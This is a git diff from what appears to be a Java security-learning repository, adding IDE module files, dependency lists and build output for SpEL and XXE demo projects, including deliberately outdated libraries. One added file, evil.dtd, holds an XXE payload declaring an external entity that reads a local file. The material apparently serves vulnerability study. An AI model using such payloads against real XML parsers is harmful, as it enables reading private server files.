+ <orderentry type="library" name="Maven: org.thymeleaf:thymeleaf:3.0.11.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.attoparser:attoparser:2.0.5.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.unbescape:unbescape:1.1.6.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.thymeleaf.extras:thymeleaf-extras-java8time:3.0.4.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.4.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.vintage:junit-vintage-engine:5.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.5.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: junit:junit:4.12" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:3.1.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.13.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:3.1.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.10.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.10.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:2.6" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.6.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-configuration-processor:2.6.7" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-freemarker:2.6.4" level="project" />
+ <orderentry type="library" name="Maven: org.freemarker:freemarker:2.3.29" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context-support:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.apache.velocity:velocity-engine-core:2.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.commons:commons-lang3:3.9" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.28" level="project" />
+ <orderentry type="library" name="Maven: org.apache.velocity.tools:velocity-tools-generic:3.0" level="project" />
+ <orderentry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.3" level="project" />
+ <orderentry type="library" name="Maven: commons-logging:commons-logging:1.2" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.2" level="project" />
+ <orderentry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
+ <orderentry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
+ <orderentry type="library" name="Maven: asm:asm:3.3.1" level="project" />
+ <orderentry type="library" name="Maven: com.github.cliftonlabs:json-simple:3.0.2" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/SpEL.iml b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/SpEL.iml
new file mode 100644
index 00000000..a8750d3e
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/SpEL.iml
@@ -0,0 +1,93 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar
new file mode 100644
index 00000000..15cb0ecb
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar.original b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar.original
new file mode 100644
index 00000000..ee587dda
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/SpEL-0.0.1-SNAPSHOT.jar.original differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/classes/SpEL.class b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/classes/SpEL.class
new file mode 100644
index 00000000..377cd062
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/classes/SpEL.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-archiver/pom.properties b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..e47c983b
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-archiver/pom.properties
@@ -0,0 +1,3 @@
+artifactId=SpEL
+groupId=com.drunkbaby
+version=0.0.1-SNAPSHOT
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..b5d25ab0
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
@@ -0,0 +1 @@
+SpEL.class
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..d2a49469
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SpEL/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1 @@
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\SpEL\src\main\java\SpEL.java
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/XXE.iml b/JavaSecurity/CodeReview/JavaSec-Code/XXE/XXE.iml
new file mode 100644
index 00000000..2d5b3131
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/XXE.iml
@@ -0,0 +1,106 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
+ <orderentry type="library" name="Maven: com.google.guava:guava:23.0" level="project" />
+ <orderentry type="library" name="Maven: com.google.code.findbugs:jsr305:1.3.9" level="project" />
+ <orderentry type="library" name="Maven: com.google.errorprone:error_prone_annotations:2.0.18" level="project" />
+ <orderentry type="library" name="Maven: com.google.j2objc:j2objc-annotations:1.1" level="project" />
+ <orderentry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
+ <orderentry type="library" name="Maven: org.dom4j:dom4j:2.1.0" level="project" />
+ <orderentry type="library" name="Maven: jaxen:jaxen:1.2.0" level="project" />
+ <orderentry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
+ <orderentry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
+ <orderentry type="library" name="Maven: asm:asm:3.3.1" level="project" />
+ <orderentry type="library" name="Maven: commons-beanutils:commons-beanutils:1.8.3" level="project" />
+ <orderentry type="library" name="Maven: commons-logging:commons-logging:1.1.1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar
new file mode 100644
index 00000000..dc4acc97
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar.original b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar.original
new file mode 100644
index 00000000..35ec4c26
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/XXE-0.0.1-SNAPSHOT.jar.original differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/application.properties b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/application.properties
new file mode 100644
index 00000000..bafddced
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/application.properties
@@ -0,0 +1 @@
+server.port=8081
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/XXEApplication.class b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/XXEApplication.class
new file mode 100644
index 00000000..178471b1
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/XXEApplication.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXE.class b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXE.class
new file mode 100644
index 00000000..dc898760
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXE.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXEDefense.class b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXEDefense.class
new file mode 100644
index 00000000..c7a6e4c7
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/controller/XXEDefense.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/utils/WebUtils.class b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/utils/WebUtils.class
new file mode 100644
index 00000000..0c786285
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/com/drunkbaby/utils/WebUtils.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/evil.dtd b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/evil.dtd
new file mode 100644
index 00000000..0ff271b0
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/classes/evil.dtd
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+ <!entity secret SYSTEM 'file:///E:/1.txt'>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-archiver/pom.properties b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..1c5ac45e
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-archiver/pom.properties
@@ -0,0 +1,3 @@
+artifactId=XXE
+groupId=com.drunkbaby
+version=0.0.1-SNAPSHOT
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..e6e1b475
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
@@ -0,0 +1,4 @@
+com\drunkbaby\utils\WebUtils.class
+com\drunkbaby\controller\XXE.class
+com\drunkbaby\XXEApplication.class
+com\drunkbaby\controller\XXEDefense.class
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..1d733713
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/XXE/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1,4 @@
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\XXE\src\main\java\com\drunkbaby\controller\XXE.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\XXE\src\main\java\com\drunkbaby\controller\XXEDefense.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\XXE\src\main\java\com\drunkbaby\utils\WebUtils.java
